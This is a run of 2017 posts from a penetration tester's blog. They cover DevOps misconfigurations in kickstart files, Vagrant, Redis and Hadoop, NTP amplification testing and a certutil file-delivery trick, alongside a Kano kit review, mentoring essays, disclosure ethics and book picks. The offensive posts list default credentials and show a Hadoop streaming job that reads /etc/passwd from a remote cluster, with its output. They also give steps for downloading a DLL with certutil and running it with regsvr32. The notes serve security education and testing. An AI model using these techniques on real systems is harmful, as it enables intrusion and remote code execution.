DevOoops: Client Provisioning (Kickstart Files)

January 13, 2017, 5:00 am

≫ Next: DevOoops: Client Provisioning (Vagrant)

≪ Previous: DevOoops: Client Provisioning (Chef)

Notes from the 2015 Devoops talk. Posting it so i can remove it from the slide deck but still refer to it. Also relevant from a common problems with devops theme.

Kickstart Files

3 ways to set root password

1. Enter during installation

2. Crypted hash in the kickstart file
“rootpw --iscrypted”

3. Clear text in the kickstart file
“rootpw --plaintext”

Examples

Kickstart Files Takeaways

Don't leave these files in open shares

Use the crypted password option for files

Have a process to change the password after initialization

Rotate the initial root password regularly

↧

DevOoops: Client Provisioning (Vagrant)

January 16, 2017, 5:00 am

≫ Next: DevOoops: In-Memory Databases (Redis) Part 2

≪ Previous: DevOoops: Client Provisioning (Kickstart Files)

Notes from the 2015 Devoops Talk

Vagrant used to ship with a default keypair and was difficult to rotate.

**fixed with new versions of Vagrant. Finding hosts using the default key still pretty likely.

Did you change your SSH keys?

Default Credentials

root/vagrant vagrant/vagrant

No pass to sudo :-)

Scanning for the default key using metasploit (ssh_login_pubkey module)

Identify real from fake by ssh version scan

Log in with private key

↧

DevOoops: In-Memory Databases (Redis) Part 2

January 18, 2017, 4:18 am

≫ Next: Kano review

≪ Previous: DevOoops: Client Provisioning (Vagrant)

Doing part 2 first as the altcoin mining stuff is interesting with the mongoDB/elasticsearch ransomware stuff currently going on.

A redis developer dropped an interesting piece of info here

http://antirez.com/news/96

Namely:

“However, the ability to control the server configuration using the CONFIG command makes the client able to change the working directory of the program and the name of the dump file. This allows clients to write RDB Redis files at random paths, that is a security issue that may easily lead to the ability to run untrusted code as the same user as Redis is running”

He goes on to show how someone could echo over SSH keys and use the config command to write them to the appropriate place if you have permissions. He used a key name of "crackit" so I thought I'd see how prevalent it was....I checked a few and saw it a good chunk of them.

go go shodan

I did find something interesting while looking thru some open redis boxes. I found:

A cron job? running a shell script. Can you do that from Redis???

What's in the shell script?!

alt coin mining! sweeeeeet.

I had no idea what an XMR is but I wanted to see how this person was doing with the money making. Thankfully you can just query the payouts for any XMR address. So I did:

They've made around $20,000 USB in BTC. I guess crime does pay :-)

To satisfy my curiosity started a miner up on a linode and was getting around 60 H/s. This person is cranking out 70 KH/s, so they have a few boxes working for them.

Extending the idea that a good hack yields plenty more I stumbled across this gem. https://phpinfo.me/2016/07/07/1275.html with several different ways to get code exec on redis.

I created some gists from the previous link in case the post disappears.

-CG-

↧

Kano review

January 21, 2017, 12:32 pm

≫ Next: InsomniaHack Trip Report

≪ Previous: DevOoops: In-Memory Databases (Redis) Part 2

Below is a quick review of the Kano computer.

WTF is it?

The kano computer is a raspberry pi based computer that is meant for kids to put together and build themselves. Looks a bit like this:

propaganda video:

It ships with a nice guide that most kids will be able to follow to get the piece of the Kano computer up and running. Optionally you can also buy a screen kit where everything can fit all together in a tidy package. The screen kit that houses the raspberry pi and and keyboard is the reason I went with the Kano over just piecing one together for the kids.

Once you get the hardware set up, the KanoOS walks you thru setting up a user account and starts off in story mode where you start off on SD beach and get to explore your computer in a RPG type environment.

You also have menu for kids where they can pick what they want to work on but also has a classic button if you want to get to a more normal Linux experience.

Not shown in the screenshot but definitely present in the menu now is a link to Scratch which this kids love. And of course no computer for kids cant not ship without Minecraft:

The OS is designed to get the kids to go through various quests to learn about the computer and as you complete quests more open up to you. More info around this is available on the Kano developer blog: http://developers.kano.me/2016/08/03/kano-os-beta-v340-released/

The Kano OS is available here: http://developers.kano.me/downloads/ if you want to throw it in a VM or raspberry pi you have around the house. It is also open source so you can contribute: https://github.com/KanoComputing

The Kano world portal also has fun stuff https://world.kano.me/projects

As an added bonus Kano has been sending emails for the kids to experiment with stuff.

This week's "Secrets of the Computer Kit" included an introduction to the Linux terminal and cowsay!

cowsay, with some Scratch on the other Kano

The kids also got their first real Linux experience by the screen flipping and it still being flipped after a reboot. We eventually found an option in the menu to flip it back but it was a nice introduction to the hell that is running Linux...good times. Enjoy Linux hell boys I'll be here to help you <3 .="" p="">3>

Overall extremely pleased.

Two negative experiences though:

One was the first upgrade process. It took over 30 minutes to download all the updates. I ended up losing the kids for the nite during that process due to it taking so long.

Second was the fact the computers showed up one day and the monitors the next!? WTF. I realize Kano doesn't have control of all things shipping but it was a real PITA to have computers and no monitors. Suggestion: bundle kits should ship together.

Aside from the above, the kids have been enjoying their new computers.

I know it's coming so i'll just address it here: 250 bucks for a raspberry pi?! Yeah kinda steep...but I did price something comparable out before I bought. Here is what I came up with:

https://www.adafruit.com/products/2718 Pi Foundation Display - 7" Touchscreen Display for Raspberry Pi $79.95

https://www.adafruit.com/products/2033 Pimoroni Raspberry Pi 7" Touchscreen Display Case - Noir $14.95

https://www.adafruit.com/products/2253 Pi Model B+ / Pi 2 / Pi 3 Case Base - Clear $5.00 LID 3.00

SD CARD 32 GB various $10-$20

https://www.adafruit.com/products/2876 Full Size Wireless Keyboard with Trackpad $39.95

https://www.arrow.com/en/products/raspberrypi3/raspberry-pi-foundation RASPBERRY PI3 $35.00

https://www.adafruit.com/products/3055 Raspberry PI3 $39.95

Speaker: ?? 10?

Misc cables to hook it al up ?? 20?

Total ~ $180

https://www.adafruit.com/products/3116 Pi-Top - GREY - A Laptop Kit for Raspberry Pi B+ / Pi 2 / Pi 3 $274.95

None of the above with the exception of the Pi-Top fit nicely together, I'd end up having build it for the kids and I wanted them to build it themselves. Plus the Kano comes in fun colors with stickers so they can make it their own. I'm satisfied with the purchase but you could technically do it for the price of a raspberry pi and SD card if you have the other gear laying around.

In a similar vein is the Piper computer if you are considering things for kids:

https://www.buildpiper.com/pages/piper-computer-kit

You can also download the piper OS image here: http://community.playpiper.com/t/how-to-download-install-the-piper-sd-card-image/311/4

↧

InsomniaHack Trip Report

March 29, 2017, 8:15 pm

≫ Next: Raspbian/Kano OS in QEMU

≪ Previous: Kano review

Insomni'Hack Info:
https://insomnihack.ch/

Favorite talks
Bridging the gap between ICS(IoT?) and corporate IT security
Stefan Lüders

I really enjoyed this talk hearing how an organization defends in a BYOD & academic environment. Defense is difficult when you control the hosts, even more so when you you cant instrument the host and have to rely on network controls only.

My favorite slide was their alerting stack:

Not sure when the slides will be released but here is an older version of the talk I found:
https://www.blackhat.com/docs/us-14/materials/us-14-Luders-Why-Control-System-Cyber-Security-Sucks.pdf

How we hacked Distributed Configuration Management Systems
Francis Alexander & Bharadwaj Machiraj

Awesome talk on breaking into

HashiCorp Consul
Apache Zookeeper
CoreOS etcd

Tool they created:
https://github.com/torque59/Garfield

Modern reconnaissance phase on APT – protection layer
Paul Rascagnères

Fun talk on how APT have been implementing some checks to make sure the targets are valid prior to sending down the final stage of the attack.

CERN
@cktricky and I also were able to give the talk at CERN. Background info on CERN: https://en.wikipedia.org/wiki/CERN

Archive of the talk:

Cool Pix:

Dropping Knowledge

Synchrocyclotron

https://en.wikipedia.org/wiki/Synchrocyclotron

Outside the Antimatter Factory

Thanks Twitter :-)
3>

↧

Raspbian/Kano OS in QEMU

May 29, 2017, 3:25 pm

≫ Next: DevOoops: Hadoop

≪ Previous: InsomniaHack Trip Report

Quick notes

I wanted to be able to boot the Kano OS in a virtual machine so i could play hack minecraft with the kids and play along with the Kano OS desktop/games. I was trying to avoid plugging a raspberry pi into an monitor to use and wanted to use it on my local laptop.

Well, not so easy. VirtualBox/VMware dont support ARM. However QEMU does.

This repo (https://github.com/dhruvvyas90/qemu-rpi-kernel/wiki/Emulating-Jessie-image-with-4.x.xx-kernel) had the recent raspberry pi kernels to use with QEMU.

If you follow the steps on that page with regards to mounting the image and editing /etc/ld.so.preload and /etc/fstab I was able to get the image to boot up successfully...slow as hell...but it technically was working.

command to boot with vnc:

$ qemu-system-arm -vnc :1 -kernel qemu-rpi-kernel/kernel-qemu-4.4.34-jessie -cpu arm1176 -m 256 -M versatilepb -append "root=/dev/sda2 rootfstype=ext4 rw" -hda Kanux-Beta-v3.9.0-Lovelace-jessie-rc-2017-03-23_04-48.img

OS with vnc:

I was so horribly slow i don't think this is feasible.  I am going to try using libvirt to make it better or just see if i can play hack minecraft another way.  If I get anywhere further with the project i'll post an update.

↧

DevOoops: Hadoop

June 5, 2017, 7:00 am

≫ Next: Mentoring: On meeting your **Heroes**

≪ Previous: Raspbian/Kano OS in QEMU

What is Hadoop?

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."
from: http://hadoop.apache.org/

If you've ever heard of MapReduce...you've heard of Hadoop.

NFI what i'm talking a bout? Here is a 3minute video on it: https://www.youtube.com/watch?v=8wjvMyc01QY

What are common issues with MapReduce / Hadoop?

Hadoop injection points from Kaluzny zeronights talk:

Hue

Common defaults admin/admin, cloudera/cloudera

Although occasionally you'll find one that will just let you pick your own :-)

If you gain access, full HDFS access, run queries, etc

HDFS WebUI

HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).

From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.

update:The hadoop attack library is worth checking out.
https://github.com/wavestone-cdt/hadoop-attack-library

Most up-to-date presentation on hadoop attack library: https://www.slideshare.net/phdays/hadoop-76515903

There is a piece around RCE (https://github.com/CERT-W/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands)

You'll need info found in ip:50070/conf

TLDR; find the correct open Hadoop ports and run a map reduce job against the remote hadoop server.

You need to be able to access the following Hadoop services through the network:

YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
DataNode data transfer service in order to upload/download file: usually on port 50010

Let's see it in action:

lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper "/bin/cat /etc/passwd" -reducer NONE

17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

packageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null

17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032

17/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 1

17/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:2

17/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_0001

17/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_0001

17/01/05 22:11:45 INFO mapreduce.Job: The url to track the job: http://nope.members.linode.com:8088/proxy/application_1483672290130_0001/

17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_0001

17/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false

17/01/05 22:12:00 INFO mapreduce.Job: map 0% reduce 0%

17/01/05 22:12:10 INFO mapreduce.Job: map 100% reduce 0%

17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully

17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30

File System Counters

FILE: Number of bytes read=0

FILE: Number of bytes written=240754

FILE: Number of read operations=0

FILE: Number of large read operations=0

FILE: Number of write operations=0

HDFS: Number of bytes read=222

HDFS: Number of bytes written=2982

HDFS: Number of read operations=10

HDFS: Number of large read operations=0

HDFS: Number of write operations=4

Job Counters

Launched map tasks=2

Data-local map tasks=2

Total time spent by all maps in occupied slots (ms)=21171

Total time spent by all reduces in occupied slots (ms)=0

Total time spent by all map tasks (ms)=21171

Total vcore-milliseconds taken by all map tasks=21171

Total megabyte-milliseconds taken by all map tasks=21679104

Map-Reduce Framework

Map input records=1

Map output records=56

Input split bytes=204

Spilled Records=0

Failed Shuffles=0

Merged Map outputs=0

GC time elapsed (ms)=279

CPU time spent (ms)=1290

Physical memory (bytes) snapshot=209928192

Virtual memory (bytes) snapshot=3763986432

Total committed heap usage (bytes)=65142784

File Input Format Counters

Bytes Read=18

File Output Format Counters

Bytes Written=2982

17/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah

lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah

17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

Found 3 items

-rw-r--r-- 3 root supergroup 0 2017-01-05 22:12 blah_blah/_SUCCESS

-rw-r--r-- 3 root supergroup 1491 2017-01-05 22:12 blah_blah/part-00000

-rw-r--r-- 3 root supergroup 1491 2017-01-05 22:12 blah_blah/part-00001

lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-00001

17/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false

systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false

systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false

systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false

syslog:x:104:108::/home/syslog:/bin/false

_apt:x:105:65534::/nonexistent:/bin/false

messagebus:x:106:110::/var/run/dbus:/bin/false

uuidd:x:107:111::/run/uuidd:/bin/false

sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin

hduser:x:1000:1000:,,,:/home/hduser:/bin/bash

http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

Walks you thru how to get reverse shells or meterpreter shells (windows) if you can run commands.

Resources:
http://2015.zeronights.org/assets/files/03-Kaluzny.pdf

video of above talk from appsecEU 2015 https://www.youtube.com/watch?v=ClXKGI8AzTk
http://hackedexistence.com/downloads/Cloud_Security_in_Map_Reduce.pdf

https://media.blackhat.com/bh-us-10/presentations/Becherer/BlackHat-USA-2010-Becherer-Andrew-Hadoop-Security-slides.pdf

https://securosis.com/assets/library/reports/Securing_Hadoop_Final_V2.pdf

https://github.com/CERT-W/hadoop-attack-library

https://www.sans.org/score/checklists/cloudera-security-hardening

http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

http://www.cloudera.com/documentation/enterprise/latest/topics/cdh_ig_ports_cdh5.html

What did I miss? Anything to add?

↧

Mentoring: On meeting your Heroes

June 7, 2017, 7:01 am

≫ Next: NTP/SNMP amplification attacks

≪ Previous: DevOoops: Hadoop

Mentoring: On meeting your **Heroes**

I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote about even the most popular infosec person is like being a famous bowler. Except for rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical and my neighbor just asks me to help configure his wifi.

This topic came up because the person I'm mentoring met "a famous infosec person" and the guy proceed to be a drunk dbag to him. It ended up taking quite a bit of wind out of his sail to have someone he kinda looked up to bag on his current career state and talks he was working on.

When I first joined the army how I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do no wrong, individual. Shit, If someone has all this shit on their chest they must be badass right??!!

For more info on badges: https://en.wikipedia.org/wiki/Badges_of_the_United_States_Army

Well the Army does a great job of stacking the people you initially meet as being pretty decent individuals. I think most people think highly of their drill sergeants their entire life. So the first few people I met that had these badges reaffirmed this belief. Then I got out and met a few more and was completely let down at the quality of these people. When I say let down, I mean defeated/totally bothered that these people didn't live up to the pedestal I had put them on. It REALLY bothered me.

What you learn is that in the military you get to wear a badge you earned at any point in your career your entire career. So maybe as some point someone was awesome enough to earn a badge. This doesn't mean they are a great leader, still good at what the badge means they are good at or even a good person. It means at one point in time they met a criteria and earned a badge.

How does this relate to Infosec?

We are all humans and generally react poorly to any sort of fame.

A good chunk of us are introverts.

The "community" values exploits and clever hacks over being a good person or helping others.

We have people that 10 years later are still riding the vapor trails of some awesome shit they did but havent done anything else relevant since. Some people have giant egos that only care about you if you are currently in the process of kissing their ass. To be fair if people ARE kissing your ass its hard not get an ego but you have to work hard to check that shit at the door.

Remember we are famous bowlers?

What can you do?

Check your ego.

Stay Humble.

Help (mentor) others.

Always remember how you felt when that hero dissed you when you are someone else's hero.

-CG

↧

NTP/SNMP amplification attacks

June 20, 2017, 3:54 pm

≫ Next: Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard

≪ Previous: Mentoring: On meeting your **Heroes**

I needed to verify a SNMP and NTP amplification vulnerability was actually working.

Metasploit has a few scanners for ntp vulns in the auxiliary/scanner/ntp/ntp_* and it will report hosts as being vulnerable to amplification attacks.

msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)

[+] 1.1.1.1:123 - Vulnerable to NTP Mode 6 READVAR DRDoS: No packet amplification and a 34x, 396-byte bandwidth amplification

I've largely not paid attention to these types of attacks in the past but in this case needed to validate I could get the vulnerable host to send traffic to a target/spoofed IP.

I set up 2 boxes to run the attack; an attack box and a target box that I used as the spoofed source IP address. I ran tcpdump on the target/spoofed server (yes...listening for UDP packets) it was receiving no UDP packets when I ran the attack. If I didn't spoof the source IP, the vulnerable server would send data back to the attacker IP but not the spoofed IP.

Metasploit (running as root) can spoof the IP for you:

msf auxiliary(ntp_readvar) > set SRCIP 2.2.2.2

SRCIP => 2.2.2.2

msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)

[*] Sending 1 packet(s) to 1.1.1.1 from 2.2.2.2

To rule out it wasn't a Metasploit thing I also worked thru the attack with scapy following the examples here:
http://www.nothink.org/misc/snmp_reflected.php

So I asked on Twitter...fucking mistake...after getting past the trolls and well intentioned people that didn't think I understood basic networking/spoofing at all (heart u) link #1, link #2 as the likely reason I couldn't spoof the IP. As well as a hint that the last time someone got it to work they had to rent a physical server in a dodgy colo.

A bit of reading later I found https://spoofer.caida.org/recent_tests.php which allows you to check and see if a particular ASN supports spoofing along with the stats that only 20% of the Internet allows spoofing.

source: https://spoofer.caida.org/summary.php

Checking common ISP and cloud provider ASNs showed that most weren't vulnerable to spoofing.

So mystery solved and another aux module/vuln scanner result that can be quickly triaged and/or ignored.

If someone has had different results please let me know.

P.S.
Someone asked if the vuln host was receiving the traffic. I couldn't answer for the initial host but to satisfy my curiosity on the issue I built a vulnerable NTP server and it did NOT receive the traffic even with hosts from the same VPS provider in the same data center (different subnets).

↧

Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard

June 26, 2017, 6:04 am

≫ Next: Follow up to the vuln disclosure post

≪ Previous: NTP/SNMP amplification attacks

Backstory:

Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.

The above is important as it relates to the rest of the post and topic(s).

I was relaying some frustrations to a close non-infosec friend about my experience of discovering companies had made some fairly serious Internet security uh ohs... like misconfigured s3 buckets full of db backups and creds, root AWS keys checked into github, or slack tokens checked into github/pastebin that would give companies a "REALLY bad day". These companies had been receptive to the reporting and fixed the problem but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.

My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.

So this blog post is an attempt for me to work thru some of these issues and have a discussion about the topics.

Questions I don't necessarily have answers for:

1. Does a vulnerability I wasn't asked to find have value?

2. If someone outside your company reports an issue and you fix it, does that issue/report now have value/deserve to be paid for (bug bounty)?

3a. If #1 or #2 is Yes, when a business doesn't have a Bug Bounty program, are they morally/ethically/peer pressure obligated to pay something? If they have a BB program I think most people agree yes. But what about when they don't?

3b. Does the size of the business make a difference? If so, what level? mom and pop maybe not, VC funded startup? 30 billion dollar Hedge Fund?

4. Is a "Thanks Bro!" enough or have we evolved as a society where basically everything deserves some sort of monetary reward. After being an observer for two BB programs...."f**k you pay me" seems to be the current attitude. If they did a public "Thanks Bro" does that make a difference/satisfy my ego?

5a. Is "making the Internet safer" enough of a reward?

5b. Does a company with an open S3 bucket make the Internet less safe? Does a company leaking client data make the Internet less safe? [I think Yes]
Does a company leaking their OWN data make the Internet less safe? [It's good for their competitors]

If they get ransomeware'd or their EC2 infra shut down/turned off/deleted codespaces style am I somewhat (morally) responsible if I didn't report it?

6. Does ignoring a pretty signifiant issue for a company make me a "bad person"?

7a. Am I a "bad person" if I want $$$ for reporting the issue?

7b. If yes, is that because I make $X and I'm being a greedy bastard? What if I made way less money?

7c. Does ignoring/not reporting an issue because I probably wont get $$ make me a "bad person"? numbers 1-3 come into play here for sure

My last two jobs, I've worked for companies that had Bug Bounty programs so my opinion on the above is DEFINITELY shaped by working for companies that ~~get it~~ understand and care about their security posture and do feel that reporting security issues by outside researchers has monetary value. An added benefit to have a program, especially through one of the BB vendors, is that you get to NDA the researchers and you get to control disclosure.

Thoughts/comments VERY welcome on this one. Leaving comments seems out of style now but I do have open DM on twitter if you want to go that route. I have a few real world experiences with this where I let some companies know some pretty serious stuff (slack token with access to corp slack, S3 buckets with creds/db backups, and root aws keys checked into github for weeks) where it was fixed with no drama but no bounty paid.

-CG

↧

Follow up to the vuln disclosure post

June 29, 2017, 5:07 am

≫ Next: Certutil for delivery of files

≪ Previous: Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard

Summary of responses from this post: http://carnal0wnage.attackresearch.com/2017/06/vulnerability-disclosure-free-bug.html

I wanted to document/summarize some of the responses I received and some of the insights I gained via self observation and my interactions with others on the topic.

I received a few replies (less than I hoped for though). To summarize a few:

-I'm not a greedy bastard for thinking it would "be nice" to get paid for reporting a vuln but I should not expect them.

-Bug Bounty awards are appreciation for the work not a right.

-Someone made a nice analogy to losing AWS/Slack keys to losing a cell phone or cat. Every person might value the return of that cat or phone differently.

-I'm super late to the game if I want to get on the "complain about bug bounties / compensation" train. **I think this is not quite the same situation but I appreciate the comment**

-The bigger the company, the harder it is to issue an ad-hoc reward if they don't have an established process.

-They [the vulns] have value - just not monetary. The value is to the end-user.

-Generally speaking, I [the author of the comment] think quite a lot of the BB crowd have a self-entitled, bad attitude.

-Always ask yourself if this will hurt innocent people. If so, report it, but make sure the public knows that they f*cked it up.

This blog post reply: https://blog.anantshri.info/response-vulnerability-disclosure-free-bug-reports-greedy-bastard/
---

I got a variety responses from it's the right thing to do... up to if they don't pay up, they don't get the info. Collectively, I don't think we are any closer to an answer.

To get a bit more personal on the subject. I think this piece from Ferris Bueller's Day Off sums it up to an extent:

https://www.youtube.com/watch?v=H19uKs99vIw&feature=youtu.be&t=1m15s

"The problem is with me"

I've been giving quite a bit of thought to what component of the process brings me the most excitement and enjoyment. I believe I have identified what component brings me the most enjoyment and will focus on that piece and work to manage any expectations I place on others.

I very much appreciate everyone that engaged in the conversation with me.

More things to think about for sure :-)

↧

Certutil for delivery of files

August 21, 2017, 5:00 am

≫ Next: Mentoring: On Blogging

≪ Previous: Follow up to the vuln disclosure post

Quick post putting together some twitter awesomeness

references:
https://twitter.com/subtee/status/888125678872399873
https://twitter.com/subTee/status/888071631528235010
https://twitter.com/malwaretechblog/status/733651527827623936

Let's do it

1. Create your DLL
2. Base64encode it (optional)
3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down

4. Base64decode the file with certutil

5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll

↧

Mentoring: On Blogging

August 25, 2017, 5:00 am

≫ Next: Books I'd give to my 30yr old self

≪ Previous: Certutil for delivery of files

Received the question about blogging. More specifically:

How and Why
How to benefit from blogging
How to be consistent with posting

In my mind, the key to success and blogging is to be totally selfish in its planning and execution.

Blogging is a personal activity/journey that you allow the public to be a part of. What I mean by this is that the main audience for your blog should be YOU. My blog is a place where I take notes and occasionally try to talk about a more touchy-feely topics or issues. These notes are notes that I'm ok with sharing publicly. I also keep a private blog (but really more notes/cheat-sheet think RTFM...I use MDwiki) because you don't need to give everyone all your tricks and secrets. If you show up for a new job and everyone knows your tricks because you've shared them publicly (because you need attention from strangers) what value are you bringing to your employer?

The benefit to blogging is note taking. I'm a HUGE proponent of taking notes and I'd chalk a lot of my success up to taking copious notes. When I figure out how to mess with technology X, I take notes on it. As a consultant, it may be months or years before I see it again. Having notes to go back to saves time and stress. It also allows me to help people on my team in the event they run into it while I am on a different project.

How/Platforms: I use Blogger because I don't want to secure/worry about my blogging platform. This blog was on Drupal for a bit and some~~jerk~~ person decided to make an example of the blog's lack of updates publicly at BlackHat (appreciate the heads up...#totallynotbitter). With Blogger, hosted WordPress, or some other hosted platform I'm offloading the risk and I don't have to worry about keeping up with patches.

Consistently posting. No idea. It's clear I have lost the ability to consistently post. I do sometimes queue up a bunch of posts and schedule their posting. I've found it was easier to find things to blog about when I was consulting since I had a different client every week so it would be difficult to tie a vulnerability back to any particular client. Now that I work for a company, if I'm talking about some vulnerability or exploit I used there is a good chance I used it for work; potentially exposing the company to risk.

Length. No one reads long posts. Break long posts into separate logical posts even if you choose to post them at the same time.

Also see the "On Social Media" post (Todo)

Also
https://www.j4vv4d.com/a-blog-about-blogging-with-bloggers/

Also see this timely tweet by Robin Wood
https://twitter.com/digininja/status/900340713669279745

↧

Books I'd give to my 30yr old self

November 16, 2017, 8:14 am

≫ Next: Dark Side Ops I & 2 Review

≪ Previous: Mentoring: On Blogging

A good friend/co-worker recently turned 30. In preparation for his birthday party I gave some thought to my 30th birthday and the things I now know or have an idea about and what I wish I had known at that point in my life.

I decided to buy him a few books that had impacted my life since my 30th birthday and that I wish I had know or read earlier in life.

I'll split the post into two parts; computer books and life/metaphysical books.

Computer books

This is buy no means an exhaustive list. A more exhaustive list can be found here (recently updated).

He already had The Web Application Hacker's Handbook but had he not I would have purchased a copy for him. There are lots of Web Hacking books but WAHH is probably the best and most comprehensive one.

The other books I did purchase were The Phoenix Project and Zero to One.

The Phoenix Project is absolutely one of the best tech books I've read in the last few years. Working for Silicon Valley companies I think it can be easy to take for granted the whole idea of DevOps and the power it brings when you can do infrastructure as code, micro services, and the flexibility DevOps can bring to prototyping and developing code and projects. There is also the "security guy" in the story that serves as the guy we never want to be but sometimes end up being unbeknownst to us.

The running joke is that Zero to One is in the Hipster starter kit but I thought it was a great book. The quick summary is that Peter Thiel describes businesses that iterate on a known problem and can be successful and there are businesses that create solutions to problems we didn't know we had. Examples of the latter being companies like Google, Facebook, PayPal, Uber. It's a short book and should be required reading for anyone thinking of starting a business.

The following is life stuff, so if all you care about is tech shit, feel free to eject at this point.

still here?

Metaphysics

1st, Many Lives Many Masters by Brian Weiss A nice gentle introduction into the idea that we reincarnate and our eternal souls. Written by a psychiatrist who more or less stumbled into the fact that people have past lives while doing normal psychiatry work.

From Amazon:
"As a traditional psychotherapist, Dr. Brian Weiss was astonished and skeptical when one of his patients began recalling past-life traumas that seemed to hold the key to her recurring nightmares and anxiety attacks. His skepticism was eroded, however, when she began to channel messages from the “space between lives,” which contained remarkable revelations about Dr. Weiss’ family and his dead son. Using past-life therapy, he was able to cure the patient and embark on a new, more meaningful phase of his own career."

2nd, A New Earth by Eckert Tolle This is the best book i read in 2016 and I've been sharing it with everyone I can. Everyone in infosec should read this book to understand the way the ego works in our day to day lives.

From Amazon:
In A New Earth, Tolle expands on these powerful ideas to show how transcending our ego-based state of consciousness is not only essential to personal happiness, but also the key to ending conflict and suffering throughout the world. Tolle describes how our attachment to the ego creates the dysfunction that leads to anger, jealousy, and unhappiness, and shows readers how to awaken to a new state of consciousness and follow the path to a truly fulfilling existence.

3rd, Self Observation by Red Hawk. The practical application guide if you got something from A New Earth. An instruction manual around self-observation.

From Amazon:
